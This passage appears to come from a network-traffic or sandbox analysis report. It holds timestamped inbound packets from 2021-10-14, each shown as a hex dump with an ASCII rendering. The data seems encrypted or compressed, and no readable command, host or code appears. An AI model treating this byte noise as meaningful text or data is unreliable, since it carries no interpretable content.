7c c6 97 59 22 f0 49 04 f4 1b f6 5d ec f9 d3 f9 18 ea 94 8c 01 ee 0f 2d 61 9c 34 80 a2 d1 98 92 6c 4f 6d 2c 6f 30 51 d4 99 1b 64 27 22 a5 d9 7d 3a a2 55 0f b9 dd 2a da d5 b5 d5 cf ab f3 9c 81 ac 40 bb a5 e8 f6 Data Ascii: :3k Rgy\|^"lN{!nEDe3W$=2EYBCOS7RE?:K&^"n1-? %_oB~2cBy\r[wLAK:`1"kz@j7WUF@1`\|Y"I]-a4lOm,o0Qd'"}:U*@
2021-10-14 02:15:48 UTC	67	IN	Data Raw: e1 bd 81 33 8e 09 5e 3e ee bc ce 7f 68 6c 1f f4 e8 71 ec 8e 2f 2a 20 84 74 e7 d8 d4 23 8d fd 89 c6 2f 42 47 5e 8f 63 3b 7e 7f 43 91 3b 29 22 18 2e a0 87 e5 96 cb 7f b0 2d ab be e4 7f 34 c9 0c 16 89 a0 74 04 d6 83 ec cb 6e 05 14 8a af e2 ec cb 8f 00 fb 94 f4 80 9e 78 9f 1d 0a 4a a5 be d9 34 e2 0c b3 6c 0d 04 38 60 43 e9 91 28 94 de e4 71 ff 54 ad 89 8b e8 a9 3e 3a e6 1c d5 e0 0c 5b d4 13 cd 8c 3f 5b ed 8b b5 65 9c 29 bc 0e ec d5 1a e1 6f c0 3f b9 e5 89 e2 79 fc 02 2f 0f aa 74 9f 6b a9 7e b1 47 48 1e 04 e6 30 68 3f 6b 5b e1 2a 44 ea 7f f2 03 05 16 bd e7 54 69 d5 5b 2e 4e 71 1b 81 18 02 01 cb 9c 0c 5d 1b bf 37 91 b8 7a 89 a3 96 4e 0e 81 8f 93 e8 65 e5 eb 0d 10 60 37 c0 6e d4 12 7d ba 36 5e 6a 14 53 bb c3 a5 e1 49 fe eb 8f 1a 89 ca 90 c2 22 8a 6a b9 86 0a 21 Data Ascii: 3^>hlq/* t#/BG^c;~C;)".-4tnxJ4l8`C(qT>:[?[e)o?y/tk~GH0h?k[*DTi[.Nq]7zNe`7n}6^jSI"j!
2021-10-14 02:15:48 UTC	68	IN	Data Raw: ad ea d9 da 6f ee cf 6c 03 e4 90 cc 7e 2d 3e ce 21 e5 75 76 5d 30 81 52 1a 3e a0 8d e9 13 d7 ca 2b 88 fc 29 2a 34 87 ac 6b b4 28 85 17 bd ff ec 43 55 18 85 f9 89 5d d4 95 78 65 f5 c1 8d 2d 63 b7 ee 4c 71 fa 34 84 b7 17 c1 b3 46 51 92 88 8b 77 7a cf 94 d0 4f 0a e5 2f 8e 1a b7 23 02 c1 43 12 43 76 00 95 f7 05 1f fe 8f 05 80 6c d0 ca 88 5f 4f 03 b6 01 fb 36 22 7e 07 37 c3 d4 15 4d fa f6 05 8f 36 49 fe 5e 89 1b 94 31 fd bc 39 5d b7 b1 0d 6d 42 79 16 0b 81 03 ba 28 46 b5 bd a1 c9 5a 1d 98 ea 43 6f 74 dd ed 8c 51 e7 20 aa 0d 1f fa bc 4d 1a 40 4d 19 dd 43 3d 33 7c 21 22 f5 8d 80 46 e7 59 da 54 4f 40 ad 13 a6 b8 39 02 5a f0 9f b6 f7 b4 fa 53 f6 b2 ea 33 77 f1 e5 31 13 c6 00 62 6f e8 03 5e ac 47 37 fd dd 55 f8 56 ed 81 10 ef ce 6d e6 9d 10 e0 2b 6c 63 8d 37 f9 aa Data Ascii: ol~->!uv]0R>+)*4k(CU]xe-cLq4FQwzO/#CCvl_O6"~7M6I^19]mBy(FZCotQ M@MC=3\|!"FYTO@9ZS3w1bo^G7UVm+lc7
2021-10-14 02:15:48 UTC	70	IN	Data Raw: 2c fb 8f 60 e6 4a 93 25 c8 b9 90 2a eb 29 1f 44 7a e6 fe 2d 41 71 ef f0 4a 5b fd fd 46 84 95 7d e6 b4 e8 2b 05 2a 81 b4 19 eb af fe de 83 05 40 42 1f b4 40 c2 68 ca d5 c0 2c 7e 4a b8 3c f0 31 7a 6e db d8 d2 51 62 f9 9e c5 ce 08 51 84 96 7a 00 0c 50 5b 86 16 ba 2b 0f f2 81 01 eb 02 c5 1d 41 3b 71 20 ea 1c 24 c4 11 c8 b2 2e 61 09 c1 ba 59 2d 7f 06 b2 aa bb 38 fd 6e fe 3e fb 9e 9a 6e 99 6e 84 10 ac 7e b9 64 cc 0e 75 06 98 38 34 84 2d 6e d1 8b 69 38 9a 40 51 9a d1 4c b6 87 b2 60 bc 3b 2d c0 0c f1 1f 0a 73 53 c1 dc 8e 5d a9 78 51 21 21 71 39 ba 15 ea ec 97 f4 61 52 06 34 f0 87 70 8b f5 07 3e 0f c8 86 0a 43 49 10 4c 4c 60 c0 13 ee 55 be 1a 6b 51 fc fa 46 f6 7b 20 28 2c 06 b3 f6 38 a7 7c 85 2b 63 48 28 ee 18 0a 12 ce cf 35 5f 1b bf 86 21 bf 50 83 f1 8d 5f 09 ac Data Ascii: ,`J%)Dz-AqJ[F}+@B@h,~J<1znQbQzP[+A;q $.aY-8n>nn~du84-ni8@QL`;-sS]xQ!!q9aR4p>CILL`UkQF{ (,8\|+cH(5_!P_
2021-10-14 02:15:48 UTC	71	IN	Data Raw: 58 d2 3b 5e 2a 32 6c 64 f9 a5 48 84 55 d1 3e 6a a8 bf 65 86 91 08 f5 0b 44 d7 fa 3f d6 bb 68 2c 9f 5d ed c4 bc 20 09 5d 48 b5 07 dc 85 4e fe cb 6b 0f fe 92 cd 69 53 1f d5 df ee 48 76 5b 58 bc 4c 48 a8 a4 86 6c 38 c6 c2 35 90 08 36 8b 18 96 ab 67 b8 21 9f 0e b7 e7 6a eb 69 c6 85 d5 88 44 c7 ec 43 6e fc 45 25 26 58 aa ef 5d 73 fc ce 9b 8a 11 cf be 66 44 82 80 9e 68 8d df b2 b8 7e 18 e3 3a 90 00 ae 26 7c e1 5d 1f b7 66 25 f6 c2 89 34 f4 84 03 90 7e cc 4a 2c 38 63 13 be 12 16 30 26 65 17 30 df da 05 be f6 e4 0d 85 2b 49 eb 91 62 3f 90 0a ec ba 2e 70 14 99 23 6f 5d 6d 0f 2b b9 12 b2 3d 8f 4b ba a7 da 5c 5e 92 e8 cd d8 65 d8 fb e3 55 e5 20 97 2a 00 e2 98 44 1a 51 50 06 c8 bd 26 1f 77 28 21 aa a2 81 27 ed 46 cc d7 47 40 ad 68 d8 aa c7 09 7b f3 83 46 f4 b4 fa 4c Data Ascii: X;^2ldHU>jeD?h,] ]HNkiSHv[XLHl856g!jiDCnE%&X]sfDh~:&\|]f%4~J,8c0&e0+Ib?.p#o]m+=K\^eU DQP&w(!'FG@h{FL
2021-10-14 02:15:48 UTC	72	IN	Data Raw: 0e 89 b5 29 10 e8 fd 99 87 b3 1f fc 17 eb ca 39 c2 45 d5 8c a0 23 5b 55 1f ed 14 26 c0 c0 77 25 42 ed 5d b5 79 ac 42 05 15 21 f3 ad 0c e6 5b 90 1a d9 34 91 2c c5 d1 84 44 7c 9f 11 2b 49 53 9e 0e 4b 5d e6 f3 46 dc 91 7d ea b4 47 2f 05 26 90 df 1a eb a9 9c 25 aa 02 4a 2d c9 a6 48 d9 68 db 44 c4 2c 78 73 31 2c d8 af 56 f9 de ce 59 25 9e f8 9f db b5 e1 78 27 9c 72 22 67 7c 81 83 3e 3e 39 82 f3 a9 96 e9 16 d7 7a 95 99 71 2a 8f c9 b9 c4 1b ca 8b a9 4d 07 c6 92 db 3a 76 11 92 29 90 a0 ff 1d 04 29 76 93 f5 93 99 7a 9a 0c ac 5e bd 64 c0 32 d9 d8 9b 3e 1a 17 a4 69 d7 f8 94 2d 8e 5e 16 c4 d0 4c b6 a7 06 e6 b8 31 38 e3 99 fd 0b 24 c3 d0 c5 da 9e a3 52 79 51 2a 5a 98 2c 92 bc e2 c4 15 e4 49 82 2d bd f2 91 fb a4 62 04 3f 1d af 6e 23 e0 43 7f bb 65 fc ca 05 ec 12 d9 1f Data Ascii: )9E#[U&w%B]yB![4,D\|+ISK]F}G/&%J-HhD,xs1,VY%x'r"g\|>>9zqM:v))vz^d2>i-^L18$RyQZ,I-b?n#Ce
2021-10-14 02:15:48 UTC	73	IN	Data Raw: 8f 27 e8 34 1f 5d 5d 13 f3 8b 4f c8 1e 20 d8 50 35 27 7e fa 11 11 9b 14 a1 ad e9 c8 70 02 96 df aa 90 fd 1b ff 25 88 40 35 49 dd 34 47 35 56 f0 40 f6 74 51 a6 ff cb 3e 6a 35 bd 5b 9f 8a 38 bc 97 55 4f e5 23 e7 7e 7b 24 a7 d4 fe ca a3 3d 07 0f cb b6 f7 c2 b7 52 73 de 68 0f f2 9e 96 f5 53 19 c2 3e ff e9 54 4a 5f aa 40 14 25 b1 83 44 a0 d7 ca 2a 07 e7 39 b0 00 88 30 7b a9 35 93 6e 2b e7 6c ed 5d f6 84 f9 83 d0 c1 8d 73 70 8b d3 2b 3d 50 bd ac d0 6a e5 2c 85 ea 8e c6 a3 73 5b d4 14 90 68 6d fe 67 bf 68 0b 79 34 91 0c af 06 84 e9 42 12 d5 76 07 e5 d6 1b 11 68 95 0c 9c 71 f3 c6 3f 30 63 9e a7 05 f7 3d 2a 98 06 37 c9 59 03 2c f3 fa 1a ee a6 50 fa 9f 92 21 f0 9a ec b2 2c 41 9c 72 23 6f 42 e3 0d 2d aa 06 bd 51 15 b4 bb 8d da 5e 82 90 cf 6b 58 74 dd e7 9f 57 e1 2c Data Ascii: '4]]O P5'~p%@5I4G5V@tQ>j5[8UO#~{$=RshS>TJ_@%D90{5n+l]sp+=Pj,s[hmghy4Bvhq?0c=7Y,P!,Ar#oB-Q^kXtW,
2021-10-14 02:15:48 UTC	75	IN	Data Raw: a6 e3 b1 40 bf a5 b5 43 0b 84 9a e0 56 27 53 a1 df cd 61 a3 66 0b 61 c8 25 45 5a 3e f5 b2 5b f9 ff 03 99 f6 a7 b5 dc 17 da 21 34 b8 f4 67 e3 fb b1 30 a6 1b 95 b7 54 ca 3f df ec d0 81 b3 2c 6e 10 71 fa 16 37 ce fc 7e 1b 8f 60 5c b3 57 a7 46 2d 58 27 d9 ae 35 41 4e 95 0b d9 a4 92 2c c9 ad 10 52 6f 9e 3a b0 40 7b 80 1c 47 4a fc 6f 7d ff 80 79 8f 86 6a 2f 0f 3f a7 35 09 e6 91 fe 23 82 05 5b 23 f3 b8 da db 66 f3 ae ab a0 79 62 33 10 54 33 52 ff f0 66 d4 22 94 eb 9b de a4 dd 61 84 9c 78 11 34 55 5b 80 4d ef 2e 0f fe ba 91 f9 05 d7 46 c1 38 71 2c 92 6c 22 c4 1b c1 89 a2 74 06 d1 83 d8 8b 6e 0f 89 2d a9 28 ef 09 15 b2 d4 94 f5 92 8b 7f 9f 09 92 ea 21 75 db 31 d9 a5 98 3e 16 27 38 7f c1 68 b9 26 8b 5a 28 fd f8 5d bc 8f 90 36 ad 3b 2b e9 a0 e1 1f 0c 51 fc f1 dd 88 Data Ascii: @CV'Safa%EZ>[!4g0T?,nq7~`\WF-X'5AN,Ro:@{GJo}yj/?5#[#fyb3T3Rf"ax4U[M.F8q,l"tn-(!u1>'8h&Z(]6;+Q
2021-10-14 02:15:48 UTC	76	IN	Data Raw: ad 2e 1f ad 9f 10 03 ad 1f d0 0e b1 ff e2 69 73 df 52 9b 01 cb 1d 87 b0 6f 0e 80 93 cc ec f0 f0 e2 a7 7e 10 f7 06 2a 58 02 9a 28 8a a8 0e 53 42 06 f9 a6 d3 d5 0a 3f ce 71 fe 25 56 e6 8f 00 9f 21 a5 bd 11 c8 d5 00 0a ce 07 8f e5 2a 32 28 b0 d7 ab 58 d3 2b 57 35 3b 92 50 d4 72 9b da 59 cb 3f 42 bd ac 55 8a fe 3a f5 0b 4e 45 95 21 c5 ad 71 28 b8 42 e2 c4 b5 3f 0d ab 56 8b f1 e5 c7 4b ef cf 79 06 e0 81 cc 76 5b e9 ce 0d fa 60 57 71 5a ab 55 0c 1c 91 95 64 32 c1 8a b2 9b f6 37 b8 05 8a ac 63 b8 20 72 07 9b e3 66 dc 45 3d 84 ff 95 64 fe 83 69 65 ea 0f 52 32 4b a2 f0 42 76 eb 39 86 58 13 fb b5 be e7 93 88 80 4e 67 de 9e b5 07 16 e7 25 95 17 c9 38 6f e9 48 1e 54 6a 09 f3 c3 1f e1 f5 a8 0a bb 7f d1 44 3f 2f 7f 0f b6 02 f3 cf 0b 40 12 30 e1 f0 17 22 ea e1 2d ab 3a Data Ascii: .isRo~X(SB?q%V!2(X+W5;PrY?BU:NE!q(B?VKyv[`WqZUd27c rfE=dieR2KBv9XNg%8oHTjD?/@0"-:
2021-10-14 02:15:48 UTC	77	IN	Data Raw: 4b 71 22 f3 25 3e 9d 52 1f 8e fe 6e 0d 0e 17 bc 7f 0f b7 d1 84 60 b9 75 88 d8 8e 8a e4 b5 54 de 38 d2 f4 b4 fc 30 60 de 65 72 e2 9d 42 bb 98 b7 4a 3f 7a 9b cc 52 0c 51 9b 4a c1 60 b8 66 17 46 3f 24 98 59 26 fe 12 5c ef 10 71 0f f4 b0 b4 d7 0f de f7 8e 94 f6 46 eb d6 7a 93 d9 71 93 9f ee e0 1d d7 9c bb e9 b3 26 67 33 1e ed 14 24 f4 d3 72 1b 2d 64 5c b3 7f bf 55 3b 59 0b e8 a7 1a f5 b4 94 21 b4 a5 9b 2c c4 a8 e2 45 50 97 15 27 41 7c 98 f3 4a 77 f5 de 6c d0 72 7f 9b f7 68 2f 01 06 8b 21 19 96 c2 8d 22 86 2f 4a 2d e2 a6 70 ca 60 ca a8 c4 2c dd 62 39 29 e6 3c 79 e2 d8 df c3 dc 9f d4 9c d7 aa f5 57 92 62 73 04 71 43 50 80 39 20 d1 0e d8 ab bd ea 29 20 6c c6 56 71 2a 81 cb 07 c6 18 bd f6 ad 65 0d ed 92 dd 29 6c 30 98 3d 90 38 fb 1d 93 3f fb 85 e3 98 b3 75 8e 1f Data Ascii: Kq"%>Rn`uT80`erBJ?zRQJ`fF?$Y&\qFzq&g3$r-d\U;Y!,EP'A\|Jwlrh/!"/J-p`,b9)<yWbsqCP9 ) lVq*e)l0=8?u
2021-10-14 02:15:48 UTC	79	IN	Data Raw: ef 32 bb 01 f2 e4 5c ad f2 3d 79 f6 1a 22 c0 7b ec ce 6b 61 c6 07 79 95 03 ff 22 51 74 6d 75 49 ac ef 12 ad 59 a8 d2 8c 07 96 0f 1f ab 8c 57 d6 ac 1f dc 0f 8d d6 cf fb 74 b0 70 f6 17 c0 72 de bb b1 04 aa cb 8e ed fa de d9 8f 3e 1f 29 00 43 5a 00 9b 32 e5 fd 0f 53 44 04 83 f1 d2 d9 16 3c e6 31 e5 27 78 95 a5 02 95 01 d9 da 13 c8 76 28 14 dd 94 8d e5 13 24 25 88 48 a9 58 c2 3d 55 01 29 6c 56 ef 95 4a aa 5b d3 35 6a ae ba ab 81 bd 25 e0 00 44 46 e2 c1 c6 81 79 0f a5 63 0c c6 c7 5b 18 55 53 8d db df aa 34 94 cf 66 14 c7 81 c5 69 51 27 cd 21 c7 64 7f 4a 57 ab 53 0b 22 b4 be 7f 38 d0 dd d4 9a da 35 bf 14 87 ab 7c 59 2c a0 04 a0 fd 62 f3 65 c6 85 d5 81 67 d2 a8 8a 6d 87 33 3a 33 4f 88 cd 4e 78 96 4c 9a a6 16 fd ad 6e 44 80 b8 83 66 5b de 9e bf 60 0b e5 34 89 18 Data Ascii: 2\=y"{kay"QtmuIYWtpr>)CZ2SD<1'xv($%HX=U)lVJ[5j%DFyc[US4fiQ'!dJWS"85\|Y,begm3:3ONxLnDf[`4
2021-10-14 02:15:48 UTC	80	IN	Data Raw: 04 53 94 79 0c 88 21 47 cb 0c cb 68 2a 13 03 cf 4e 6b 2f 45 08 79 d1 21 6d 9a bb d2 fc 29 e2 bb 90 17 29 87 bf c8 40 e9 e0 b5 ec 08 ee 24 2a e4 c9 0f 6f e5 62 e1 19 1c bc e4 11 56 cb b7 2d 0e 71 bc 27 93 fe 11 b3 4b c7 0d b1 6a b1 9e 47 7f cb fd 5e fd 82 62 45 a8 b5 4a 8b 7c 84 ec 4b 77 cd 8c 43 eb 54 b7 fa 16 4e e3 05 38 5b 3e f5 8e 5d e6 cd 50 c6 f6 a7 bf 4b 0e d9 2d 90 f3 68 6b f6 d8 86 d7 3e 1d 8c b9 f5 c7 a3 d3 80 e1 a3 72 26 63 19 82 eb 0b 1f e4 5f 72 33 2d f8 5a aa 56 9f ba 2d 52 20 6f a1 02 c8 6a 43 0d b6 bd 0c 2a dc 95 3c a3 7c 95 02 b0 47 64 ac 12 6c c7 f1 ea 43 e4 e4 e1 e6 83 46 33 99 2a b6 0c 3a 60 a9 8d 22 1e 03 55 1d fd fc dc ce 7f d3 be 58 2a 67 50 19 e4 f0 37 52 65 de c7 e7 3d 91 64 98 d0 95 ea 60 18 9a 6d 1d 53 f4 5b 80 3e a4 29 10 c2 89 Data Ascii: Sy!GhNk/Ey!m))@$obV-q'KjG^bEJ\|KwCTN8[>]PK-hk>r&c_r3-ZV-R ojC<\|GdlCF3:`"UX*gP7Re=d`mS[>)
2021-10-14 02:15:48 UTC	81	IN	Data Raw: f9 64 8a f3 0c 00 68 28 d0 6b dd 12 6c be 28 a0 6b 22 69 a9 cb af d7 62 8e c6 8f 1c 98 d9 e4 e3 33 88 72 9b e6 22 a0 ff 0d e9 24 3c 05 df ef 75 87 e3 29 57 26 3c 20 ca 66 1a f3 18 30 c6 2f d3 fa 40 f4 0a 0d 76 6e 57 00 b6 e6 07 c9 71 bb d9 9d 96 ac 22 0d a5 a6 8c 90 ad 19 f2 78 a5 e9 c0 ec e8 cc 5d e8 04 c1 1d 9c b1 a7 fc a9 88 cf fb e9 d3 da b6 75 05 3b f8 2d 5e 00 b0 3d b2 8f f0 ac bd 0f c6 b3 c0 e9 15 3f 87 70 e0 27 d5 fa 8d 11 83 07 9d bc 12 c0 68 fc 0b e2 ab 8d 9b 9d 24 25 8c 56 81 ca d2 2b 54 21 2b 60 51 f0 7c b5 87 75 c9 26 66 a9 a4 43 7e 90 0b f5 1c 48 41 f2 26 39 ac 57 26 8c 4a c4 09 94 b7 18 55 5d a0 e3 da 27 fe f5 15 09 03 ec 81 cf 43 42 17 cf 32 df 61 7f bf 5f ab 53 b6 34 bf 84 72 35 fc 89 2a 92 ec c9 a6 33 83 ba 40 bc 20 8c 0f ae 08 63 d8 77 Data Ascii: dh(kl(k"ib3r"$<u)W&< f0/@vnWq"x]u;-^=?p'h$%V+T!+`Q\|u&fC~HA&9W&JU]'CB2a_S4r5*3@ cw
2021-10-14 02:15:48 UTC	82	IN	Data Raw: d6 96 cb d7 7e 2c 99 2a ab 3c fb 0c 06 24 05 95 d9 91 b3 6c a5 93 8d d7 bd 7f fa 25 f1 e9 9a 3e 1c ae 29 6e c6 fa eb aa 9a 4a 34 71 f8 62 bc 8f 90 f0 96 1b 28 96 1b f5 1f 06 4d fc eb dc 88 24 43 4a 53 00 41 88 46 29 1f e2 ce 09 d8 4f 54 2e b7 e2 b4 7d 8b 4c 06 3e 0f b1 a7 a4 41 43 7f b2 5e 67 b9 b9 e6 3a 4a 10 7a 5c f8 31 43 f7 78 35 01 64 ce b3 f6 4c 4b 6f ae 3f 7a 48 3d 91 77 e9 13 c4 be 27 56 1c a7 e2 b9 88 52 89 e8 e5 82 0e 81 85 82 f8 74 33 f8 1d 11 72 26 d2 4a 0a 61 c1 b5 36 54 67 18 54 d4 f5 bc d1 40 e9 1d 9c 09 9a dc a8 2d 33 88 69 96 e3 06 4e c9 0f ef 38 99 bf db ef 72 85 df 13 7f 85 36 36 f3 7a 9f e4 a6 34 c7 01 10 36 40 fe 28 50 67 62 32 3f ab ef 1e ea ce ae d2 80 7e 85 20 1f ad 84 2e a7 a6 16 f2 cc a1 e9 cc 94 be df 58 fe 10 db 11 e2 8e b3 02 Data Ascii: ~,*<$l%>)nJ4qb(M$CJSAF)OT.}L>AC^g:Jz\1Cx5dLKo?zH=w'VRt3r&Ja6TgT@-3iN8r66z46@(Pgb2?~ .X
2021-10-14 02:15:48 UTC	83	IN	Data Raw: 31 b6 bf 11 d4 b3 b8 48 98 a3 dc 61 71 a5 58 bf 68 0f 6b 92 88 c9 97 39 7b c3 59 1f 49 6e 11 04 dd 28 12 f7 86 79 45 7a d3 40 b1 87 52 d7 af 06 e8 38 11 92 07 1b d0 c7 69 e4 ec f7 01 82 ab 61 74 80 9c 3e e3 26 7d bc 33 4e 92 81 24 45 5e 72 1c 2a af fd bb 0e 9a a2 b6 8b c0 46 a2 85 c6 41 44 76 f6 69 8b 46 31 2b 9a 04 2e 65 88 52 cc 6a 58 0a ed 45 27 9e 7d 20 39 76 8b 80 36 f1 4a d3 fc 90 40 bc 60 c7 a8 30 10 a9 f8 dc 49 f2 a3 26 be fb b2 c2 4c 65 f8 ef 33 1f cd f8 72 46 f3 16 58 f8 7c 67 0b dc 54 e1 59 f1 85 c3 f8 09 e9 a4 63 11 cd 21 6b 0f b6 2c fc b2 d0 89 91 4e 75 6c 00 6a 37 4d d7 83 c4 77 2e 3a ad 31 4f 47 9f 52 13 79 42 0d f1 9c a5 d3 f4 b7 e0 bb 9a 9a 2b 87 ae 64 cf e9 e0 b4 66 26 cd 3f 35 97 7d 34 72 ff 48 27 af 1c bc 72 3b 60 cd bb 6b 92 66 aa 22 Data Ascii: 1HaqXhk9{YIn(yEz@R8iat>&}3N$E^r*FADviF1+.eRjXE'} 9v6J@`0I&Le3rFX\|gTYc!k,Nulj7Mw.:1OGRyB+df&?5}4rH'r;`kf"
2021-10-14 02:15:48 UTC	84	IN	Data Raw: 20 9e f2 8d c1 b2 f9 4f c0 8f 7d 28 62 5b 44 99 c0 39 03 1c e5 af 81 64 3d c3 6e bc 12 42 2b 85 eb 36 cc 04 da 89 a2 65 18 c8 8d c0 d7 7e 2c 89 3f b1 29 f2 8b 6d bc fa 94 f3 aa bb 66 8e 18 9b e3 ae 6b ca 37 fe 1c 66 3f 30 08 11 52 df f8 95 26 93 59 31 67 c1 43 a1 71 9b ca 97 39 29 93 41 f5 1f 08 2f 55 c5 dc 89 2c 2e b0 51 2b 4a 02 8f bd c9 f5 12 92 db 61 54 2c 95 b3 85 76 a9 16 26 3e 09 a0 07 c2 43 43 7b af 5e 6f ca 14 e9 25 55 e5 6a 77 e6 31 5d cc 79 24 10 01 14 b5 e9 50 4b 72 85 30 64 46 22 7f 19 24 1a c2 b7 e3 57 04 ba fa 9e be 41 86 fd a7 b0 0f ad 90 91 93 ab e5 eb 09 73 5c 35 c0 72 a8 50 7f b5 3c 76 22 0c 53 b1 d4 fe d7 4f fe c7 90 34 9a df 90 d3 3c 97 4f 6f f3 26 62 ff 76 26 32 b1 06 d7 fe 70 45 78 16 7f 85 3e 08 87 70 96 c6 1a 4b 01 07 7f fe 46 8d Data Ascii: O}(b[D9d=nB+6e~,?)mfk7f?0R&Y1gCq9)A/U,.Q+JaT,v&>CC{^o%Ujw1]y$PKr0dF"$WAs\5rP<v"SO4<Oo&bv&2pEx>pKF
2021-10-14 02:15:48 UTC	86	IN	Data Raw: 64 38 d3 cc 59 a5 f4 37 ad 0e 82 df 55 a5 2d 86 2e f7 f4 62 fe 74 2e 12 8a bc 4e d0 89 41 2f fe 4f 30 1b 0a a0 ef 46 72 fc a6 2d c9 01 d6 ad 64 39 40 88 81 62 6c eb 8d b0 68 1a ea 3a b7 ed a7 0a 4c eb 39 da 49 67 0d 89 e2 06 1f fe 9c 68 f0 45 d1 44 35 18 2b 00 b6 01 fe 71 75 6e 06 37 d6 ec 01 2d ec e6 0a 9a 2c bf f5 ac 89 3c ba 82 ec b4 1b 14 bc 99 29 00 c0 7e 1c 25 aa 06 a5 35 8b ba bb 9a c6 45 50 7a eb 6f 5e 76 de 9e b2 53 e7 2a 83 66 6c c5 89 4c 10 68 18 1b dd 49 36 37 64 f8 4a 81 89 80 2d cf 19 d8 c4 45 68 fd 62 c7 b3 21 67 d3 f8 f0 45 fc ab fd 53 ff b0 d3 5a 69 c1 11 23 3a f6 04 08 a2 fe 12 5f 51 ce 5a 0b d6 4d 98 2e d5 94 ca f2 30 a8 bb 9d 1a f7 67 39 9b 63 cd f0 8a c3 97 98 44 84 72 30 91 20 6b db 99 dc 7e a9 2c b8 a5 70 50 48 bc e8 70 d3 21 fe 9c Data Ascii: d8Y7U-.bt.NA/O0Fr-d9@blh:L9IghED5+qun7-,<)~%5EPzo^vS*flLhI67dJ-Ehb!gESZi#:_QZM.0g9cDr0 k~,pPHp!
2021-10-14 02:15:48 UTC	87	IN	Data Raw: 7d f4 91 6c ef 83 25 d1 04 00 ab 08 1f d3 32 7e dd 7d 2f 4a 2d f9 85 47 c8 11 e5 a8 c4 9a 78 62 28 3a 8b f1 52 f9 dc db 50 b3 81 f5 de 8b a7 f5 50 86 9f 01 16 71 54 51 99 54 4b 10 0d f4 a3 be a8 00 c3 64 95 7b 73 2a 8f f9 4a 40 1a c0 9c de 5b 0b c7 98 a3 6b 7d 00 90 15 fb 3a fb 17 8e df fb 94 f4 9f 8e 63 8c 63 4f fd bd 60 e6 63 f3 79 53 3e 1c 05 a7 d9 da fa 97 42 51 4a 3e 63 a4 cd bc 8f 9b e4 c3 f0 2b e8 8c 7b a8 80 64 d4 c5 dd 80 06 66 78 51 21 66 d6 38 ba 15 f5 12 92 da 61 54 2c 95 b3 85 76 a9 16 27 3e 09 a0 07 c0 43 43 7b 9a 5e 62 c2 2d bc 3a 40 11 7c 8d 66 0a 55 e4 6a 59 db 0b 07 b7 e0 4e 70 27 85 21 61 4a 3d 92 1e 30 83 c1 b4 34 5f 18 c6 d7 93 be 5a 97 88 f9 71 0c 81 85 bb a8 61 e5 e1 1c 06 7a ef b3 3c d4 12 77 9d 76 5c 6a 04 7b fa c0 be db 52 91 43 Data Ascii: }l%2~}/J-Gxb(:RPPqTQTKd{s*J@[k}:ccO`cyS>BQJ>c+{dfxQ!f8aT,v'>CC{^b-:@\|fUjYNp'!aJ=04_Zqaz<wv\j{RC
2021-10-14 02:15:48 UTC	88	IN	Data Raw: c3 de 45 26 a7 42 f6 ae cf 1f 1a 55 5d 8f b1 df a9 43 f9 8f 6b 11 ed 81 c7 12 89 17 cf 25 e6 75 79 9c d0 81 53 1a 36 c4 45 64 38 d3 db 27 b3 bf 35 a7 15 85 d7 ac a7 2d 88 01 c4 c8 60 f4 77 29 8c 8a bc 4e d0 89 41 2f fe 4f 30 22 4f d1 ab 4e 7b e1 18 da a4 12 dd 85 2f 46 93 82 90 63 62 d3 11 96 68 0b e7 5e 52 13 a6 22 da 86 51 13 49 6d ab c2 73 04 1f f4 86 79 48 7a d3 40 36 21 65 d4 39 21 e8 31 08 17 d6 37 c9 c1 03 2f c4 b0 04 85 30 43 8f 46 9c 3e b8 01 8e 82 31 4e b6 88 2b 1c 7d 7d 1c 29 91 43 b8 22 92 a4 bf f8 8d 58 5c 8e c2 03 6d 74 d7 c5 cd 53 e7 2a 8c 09 0e f7 04 65 1a 40 5a 62 10 43 27 37 cb 4f 2a c4 8b 8a 85 cc 0d d8 bf 84 40 bc 64 ce a8 3f de d8 d3 f0 43 f4 cf 20 40 f0 b4 d3 58 74 f6 9c 1c 14 d7 0c 62 62 8d 2d 59 22 fa 70 4b de 55 f8 4c ee e5 8e fa Data Ascii: E&BU]Ck%uyS6Ed8'5-`w)NA/O0"ON{/Fcbh^R"QImsyHz@6!e9!17/0CF>1N+}})C"X\mtSe@ZbC'7O@d?C @Xtbb-Y"pKUL
2021-10-14 02:15:48 UTC	89	IN	Data Raw: c4 d1 78 20 28 4c 4d b5 7f b5 e6 2b 43 24 69 b3 35 2f 4e 95 0b a1 30 97 2c c3 bf 0f 4e 6d 9f 14 04 8f 7f 80 0b e9 4a fd e1 7a ef b9 de e0 9c 62 39 89 13 a9 23 1b fd 81 7c 23 82 0f 66 2f c9 f0 42 ca 1b 2e a8 c4 28 0c e3 39 38 f1 26 56 ee 0e 55 c1 22 9e f9 b6 88 a3 f5 5a f0 bd 72 28 68 29 97 80 3e 3c 2d 74 38 a9 96 ec 13 c7 68 ac 3e eb 02 19 e1 25 ce b9 d1 9e ba b3 1a c3 83 d9 38 77 3e d7 c3 47 c7 f9 1f 79 f6 fb 94 f1 94 17 45 8e 18 86 86 68 64 ca 22 e6 68 42 3c 67 c6 29 6e d3 96 4d 83 f5 cc 3f 67 d6 66 af bf 98 e6 92 3b 2b e8 8e f5 1f 1d 4d df ee c7 88 29 42 87 50 07 4c 94 33 ba 18 f4 3a 1e dc 63 43 25 bd f3 9f 88 a2 4e 06 15 0b 90 99 09 38 88 7f b1 49 ee 7d 2f e6 3a 53 2b 68 5b 9e 20 55 e4 60 24 10 1a 11 b8 dd 1d 58 7a 92 df 6a 75 2e 99 13 08 15 dd 4a 35 Data Ascii: x (LM+C$i5/N0,NmJzb9#\|#f/B.(98&VU"Zr(h)><-t8h>%8w>GyEhd"hB<g)nM?gf;+M)BPL3:cC%N8I}/:S+h[ U`$Xzju.J5
